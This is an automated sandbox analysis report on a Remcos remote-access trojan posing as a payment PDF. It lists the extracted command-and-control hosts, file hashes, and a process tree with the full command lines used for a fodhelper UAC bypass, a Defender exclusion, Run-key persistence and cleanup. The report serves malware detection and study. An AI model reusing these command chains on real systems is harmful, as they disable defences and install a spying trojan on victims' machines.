Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
25-07-2024 14:40
Static task
static1
Behavioral task
behavioral1
Sample
Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe
Resource
win10v2004-20240709-en
General
-
Target
Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe
-
Size
1.1MB
-
MD5
2d655119c0aa977debf88758f2009729
-
SHA1
40c98ca63e9f78284cddbefddc03b6c6ad070462
-
SHA256
e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9
-
SHA512
fe96ee94b8c57c76650288eb589eb41b0430ea45597d025c1ecead87cafd75d5bb58204999ca78f736f54b26b247959d079a498784bdcb274bc159fcc4b395c8
-
SSDEEP
24576:Edd+fYkdMwkRdF36Xq5W2xnXuWmStY6mATIU:EHkvXqE2NXufB6Xv
Malware Config
Extracted
remcos
RemoteHost
127.0.0.1:45645
127.0.0.1:56765
latestgrace2024.duckdns.org:56765
latestgrace2024.duckdns.org:45645
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-2ZXBPR
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
per.exeioeztdcY.pifdescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation per.exe Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation ioeztdcY.pif -
Executes dropped EXE 21 IoCs
Processes:
ioeztdcY.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exeper.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exepid process 3272 ioeztdcY.pif 5084 alpha.exe 4664 alpha.exe 4796 alpha.exe 3912 alpha.exe 3376 alpha.exe 3676 alpha.exe 4476 alpha.exe 2168 xkn.exe 2012 alpha.exe 1484 ger.exe 3408 per.exe 3592 alpha.exe 724 alpha.exe 4492 alpha.exe 3676 alpha.exe 2488 alpha.exe 3992 alpha.exe 4580 alpha.exe 1684 alpha.exe 4784 alpha.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ycdtzeoi = "C:\\Users\\Public\\Ycdtzeoi.url" Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exedescription pid process target process PID 1528 set thread context of 3272 1528 Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe ioeztdcY.pif -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
ioeztdcY.pifextrac32.exeSndVol.exeScan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ioeztdcY.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SndVol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
alpha.exePING.EXEalpha.exePING.EXEpid process 3376 alpha.exe 2104 PING.EXE 4492 alpha.exe 1968 PING.EXE -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 4136 taskkill.exe 4020 taskkill.exe 428 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
ger.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe -
Processes:
xkn.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 xkn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e xkn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e xkn.exe -
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
xkn.exeScan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exepid process 2168 xkn.exe 2168 xkn.exe 2168 xkn.exe 1528 Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe 1528 Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
xkn.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2168 xkn.exe Token: SeDebugPrivilege 4136 taskkill.exe Token: SeDebugPrivilege 4020 taskkill.exe Token: SeDebugPrivilege 428 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
SndVol.exepid process 4600 SndVol.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
SndVol.exepid process 4600 SndVol.exe 4600 SndVol.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exeioeztdcY.pifcmd.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exealpha.exedescription pid process target process PID 1528 wrote to memory of 3272 1528 Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe ioeztdcY.pif PID 1528 wrote to memory of 3272 1528 Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe ioeztdcY.pif PID 1528 wrote to memory of 3272 1528 Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe ioeztdcY.pif PID 1528 wrote to memory of 3272 1528 Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe ioeztdcY.pif PID 1528 wrote to memory of 3272 1528 Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe ioeztdcY.pif PID 3272 wrote to memory of 2188 3272 ioeztdcY.pif cmd.exe PID 3272 wrote to memory of 2188 3272 ioeztdcY.pif cmd.exe PID 2188 wrote to memory of 4632 2188 cmd.exe extrac32.exe PID 2188 wrote to memory of 4632 2188 cmd.exe extrac32.exe PID 2188 wrote to memory of 5084 2188 cmd.exe alpha.exe PID 2188 wrote to memory of 5084 2188 cmd.exe alpha.exe PID 2188 wrote to memory of 4664 2188 cmd.exe alpha.exe PID 2188 wrote to memory of 4664 2188 cmd.exe alpha.exe PID 2188 wrote to memory of 4796 2188 cmd.exe alpha.exe PID 2188 wrote to memory of 4796 2188 cmd.exe alpha.exe PID 4796 wrote to memory of 2724 4796 alpha.exe extrac32.exe PID 4796 wrote to memory of 2724 4796 alpha.exe extrac32.exe PID 2188 wrote to memory of 3912 2188 cmd.exe alpha.exe PID 2188 wrote to memory of 3912 2188 cmd.exe alpha.exe PID 3912 wrote to memory of 3044 3912 alpha.exe extrac32.exe PID 3912 wrote to memory of 3044 3912 alpha.exe extrac32.exe PID 2188 wrote to memory of 3376 2188 cmd.exe alpha.exe PID 2188 wrote to memory of 3376 2188 cmd.exe alpha.exe PID 3376 wrote to memory of 2104 3376 alpha.exe PING.EXE PID 3376 wrote to memory of 2104 3376 alpha.exe PING.EXE PID 2188 wrote to memory of 2728 2188 cmd.exe cmd.exe PID 2188 wrote to memory of 2728 2188 cmd.exe cmd.exe PID 2188 wrote to memory of 3676 2188 cmd.exe alpha.exe PID 2188 wrote to memory of 3676 2188 cmd.exe alpha.exe PID 3676 wrote to memory of 4376 3676 alpha.exe extrac32.exe PID 3676 wrote to memory of 4376 3676 alpha.exe extrac32.exe PID 2188 wrote to memory of 4476 2188 cmd.exe alpha.exe PID 2188 wrote to memory of 4476 2188 cmd.exe alpha.exe PID 4476 wrote to memory of 2168 4476 alpha.exe xkn.exe PID 4476 wrote to memory of 2168 4476 alpha.exe xkn.exe PID 2168 wrote to memory of 2012 2168 xkn.exe alpha.exe PID 2168 wrote to memory of 2012 2168 xkn.exe alpha.exe PID 2012 wrote to memory of 1484 2012 alpha.exe ger.exe PID 2012 wrote to memory of 1484 2012 alpha.exe ger.exe PID 2188 wrote to memory of 3408 2188 cmd.exe per.exe PID 2188 wrote to memory of 3408 2188 cmd.exe per.exe PID 1528 wrote to memory of 4500 1528 Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe extrac32.exe PID 1528 wrote to memory of 4500 1528 Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe extrac32.exe PID 1528 wrote to memory of 4500 1528 Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe extrac32.exe PID 1528 wrote to memory of 4600 1528 Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe SndVol.exe PID 1528 wrote to memory of 4600 1528 Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe SndVol.exe PID 1528 wrote to memory of 4600 1528 Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe SndVol.exe PID 1528 wrote to memory of 4600 1528 Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe SndVol.exe PID 2188 wrote to memory of 3592 2188 cmd.exe alpha.exe PID 2188 wrote to memory of 3592 2188 cmd.exe alpha.exe PID 3592 wrote to memory of 4136 3592 alpha.exe taskkill.exe PID 3592 wrote to memory of 4136 3592 alpha.exe taskkill.exe PID 2188 wrote to memory of 724 2188 cmd.exe alpha.exe PID 2188 wrote to memory of 724 2188 cmd.exe alpha.exe PID 724 wrote to memory of 4020 724 alpha.exe taskkill.exe PID 724 wrote to memory of 4020 724 alpha.exe taskkill.exe PID 2188 wrote to memory of 4492 2188 cmd.exe alpha.exe PID 2188 wrote to memory of 4492 2188 cmd.exe alpha.exe PID 4492 wrote to memory of 1968 4492 alpha.exe PING.EXE PID 4492 wrote to memory of 1968 4492 alpha.exe PING.EXE PID 2188 wrote to memory of 3676 2188 cmd.exe alpha.exe PID 2188 wrote to memory of 3676 2188 cmd.exe alpha.exe PID 2188 wrote to memory of 2488 2188 cmd.exe alpha.exe PID 2188 wrote to memory of 2488 2188 cmd.exe alpha.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe"C:\Users\Admin\AppData\Local\Temp\Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Users\Public\Libraries\ioeztdcY.pifC:\Users\Public\Libraries\ioeztdcY.pif2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1619.tmp\161A.tmp\161B.bat C:\Users\Public\Libraries\ioeztdcY.pif"3⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"4⤵PID:4632
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "4⤵
- Executes dropped EXE
PID:5084 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"4⤵
- Executes dropped EXE
PID:4664 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"5⤵PID:2724
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"5⤵PID:3044
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 24⤵
- Executes dropped EXE
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 25⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2104 -
C:\Windows\system32\cmd.execmd.exe4⤵PID:2728
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"5⤵PID:4376
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""7⤵
- Executes dropped EXE
- Modifies registry class
PID:1484 -
C:\Windows \System32\per.exe"C:\\Windows \\System32\\per.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:3408 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4136 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:724 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettingsAdminFlows.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4020 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 24⤵
- Executes dropped EXE
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 25⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1968 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"4⤵
- Executes dropped EXE
PID:3676 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"4⤵
- Executes dropped EXE
PID:2488 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"4⤵
- Executes dropped EXE
PID:3992 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:4580 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:1684 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM cmd.exe4⤵
- Executes dropped EXE
PID:4784 -
C:\Windows\system32\taskkill.exetaskkill /F /IM cmd.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:428 -
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Admin\AppData\Local\Temp\Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe C:\\Users\\Public\\Libraries\\Ycdtzeoi.PIF2⤵
- System Location Discovery: System Language Discovery
PID:4500 -
C:\Windows\SysWOW64\SndVol.exeC:\Windows\System32\SndVol.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4600
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper1⤵PID:3528
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
130B
MD5d90c01583a67296f72cd482ff8c6a4bd
SHA10c49efbeedc1465efe4bb2636ac1d7b8c1fcee79
SHA256fde039f313927458fce563c08217c3778704334959f1f1908b70b956223b1137
SHA51276ee54d807ce5a037704e230a6ab98df9e7aa9c3843e042e8092f4f83b5ac5bda692f5db9a7c2fef4133e8987aba638eacfb52e16aa1cfbd0f235eb5aebb3dde
-
Filesize
1KB
MD554147a112fd4c4fffbdeb2eeab926f59
SHA17f4ae3d3dd6202e47bc02438a947065c7ed115a9
SHA256b040ccd004e2e55f8ad1b022388bbcc72eefd37f122ec2c5ef1601ecabd7dc46
SHA51220c214b5efb1c70df2704fb487d9ba4fddbc87e1e295d9b7320ce1617f532dc0fd814a016f91ae161ba506a20dcbcea337c6bbec74edb71824035334608b2488
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
Filesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
75KB
MD5227f63e1d9008b36bdbcc4b397780be4
SHA1c0db341defa8ef40c03ed769a9001d600e0f4dae
SHA256c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d
SHA512101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
